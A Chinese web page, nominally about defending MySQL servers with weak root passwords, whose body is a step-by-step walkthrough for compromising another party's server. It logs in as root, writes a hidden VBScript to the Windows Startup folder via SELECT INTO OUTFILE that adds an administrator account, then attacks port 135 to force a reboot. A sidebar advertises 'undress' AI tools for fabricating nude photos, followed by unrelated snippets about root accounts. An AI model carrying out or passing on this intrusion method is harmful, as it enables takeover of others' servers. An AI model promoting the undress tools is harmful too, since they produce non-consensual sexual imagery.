防止mysql用户root密码弱口令的攻击方法
文章介绍关于防止mysql用户root密码弱口令的攻击,大家可以看看自己的mysql root是不是也存在这样的安全隐患。
1、连接到对方MYSQL 服务器
-u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。
2、让我们来看看服务器中有些什么
mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test; 我们将会进入test数据库中。
4、查看我们进入数据库中有些什么数据表
mysql>show tables; 默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text); 好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
代码如下 | 复制代码 |
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " ); mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " ); |
注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序! 7、好了,现在我们来看看表a中有些什么
mysql> * from a;我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
8、输出表为一个VBS的脚本文件
mysql>select * from a into outfile "c:\docume~1\alluse~1\“开始”菜单\程序\启动\a.vbs"; 我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。
9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。
总结:不管你什么时候都需要注意自己服务器的安全否则就别谈其它应用程序了,本文章讲述的mysql root密码弱口令的攻击只是安全应用中的冰山一解而己。

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3漢化版
中文版,非常好用

禪工作室 13.0.1
強大的PHP整合開發環境

Dreamweaver CS6
視覺化網頁開發工具

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

在Ubuntu系統中,root使用者通常是停用狀態的。要啟動root用戶,可以使用passwd指令設定密碼,然後使用su-指令以root身分登入。根用戶是具有系統管理權限且不受限制的使用者。他擁有存取和修改檔案、使用者管理、軟體安裝和刪除,以及系統配置變更等權限。根用戶與一般用戶有著明顯的區別,根用戶擁有系統中最高的權限和更廣泛的控制權。根用戶可以執行重要的系統命令和編輯系統文件,而普通用戶則無法做到這一點。在本指南中,我將探討Ubuntu根用戶,如何以根用戶身份登錄,以及它與一般用戶的不同之處。注意

root和alias都可以定義在location模組中,都是用來指定請求資源的真實路徑,例如:location/i/{root/data/w3;}請求http://foofish.net/i/top.gif這個位址時,那麼在伺服器裡面對應的真正的資源是/data/w3/i/top.gif檔案注意:真實的路徑是root指定的值加上location指定的值。而alias正如其名,alias指定的路徑是location的別名,不管location的值怎麼寫,資源的真實路徑都是alias指定的路徑,例如

0x01 文章背景近期,筆者所在公司的某業務系統的儲存臨近極限,伺服器馬上就要跑不動了,由於該業務系統A包含多個子系統A1、A2、A3 ... An,這些子系統的中間儲存檔案由於設計原因,都儲存在同一個父級目錄之內,唯一不同的是,不同子系統產生的檔案和資料夾的名字都以該子系統名稱開始。如A1子系統產生的檔案命名方式均為A1xxxxxx, A2子系統產生的檔案名稱均為A2xxxxx。現在要刪除其中一些子系統的歷史文件,以釋放伺服器空間,幾十T的數據,存放在一起,手動刪除肯定不顯示,只能藉助程式自動化

1.以CentOS為例,登入後修改/etc/passwd與/etc/shadow,第一行開始的root改為新的使用者名稱(例如admin),修改之後透過wq!儲存。 2、修改並儲存後,重新啟動伺服器後即可生效,可以看下檔案的權限,可以看到所屬帳號一欄變為admin了,如下:註:在Linux中預設的最高管理權限使用者是root,uid為0。在系統中只辨識uid,因此只要uid為0,系統就視為最高管理使用者。但對於應用程式可能會有一定的問題,有些軟體預設使用的是root用戶,所以在對軟體應用的了解有限的情況

手機root的好處:1、可以備份系統;2、可以使用進階的程式;3、可以修改、可以移除系統的程式;4、可以把程式安裝在sd卡上;5、可以修改系統字型等等。壞處:1、手機root後容易被木馬病毒侵入;2、可能因為不徹底以及軟體相容性等問題,導致系統損壞出現系統運作問題;3、手機root後軟體錯誤系統檔案導致系統錯誤;4、手機root後用戶隱私有外洩風險等等。

步驟一:先登入MySQL在終端機中輸入以下指令,進入MySQL控制台:sudomysql如果輸入該指令後提示您輸入密碼,請輸入您的root使用者的密碼。步驟二:更改密碼當我們進入MySQL的控制台之後,就可以開始更改root使用者的密碼了。依照下面的指令設定密碼:ALTERUSER'root'@'localhost'IDENTIFIEDWITHmysql_native_passwordBY'new_password&am

目前手機未root是指手機的作業系統沒有取得超級使用者權限,在Android系統中,root權限是一種最高權限,它允許使用者對系統進行深層的修改和存取敏感的系統文件,手機仍處於默認狀態,沒有進行任何系統權限的修改,這意味著用戶無法直接存取和修改系統文件,無法進行一些高級的系統操作,普通用戶使用未root的手機,可以正常使用手機的基本功能和安裝應用程序,在某些特點場景會有限制。

對於一些共用的機器,可能我們並沒有root權限,在安裝程式時會稍微麻煩點,其實只要把相關文件放在自己的目錄下就可以免去root權限限制了。我裝libevent,無root權限,透過prefix指定安裝路徑為我的/home目錄下即可:./configure--prefix=/home/****/libevent--enable-sharedmakemakeinstallmakeverify#libevent的測試,其他的安裝不一定有。
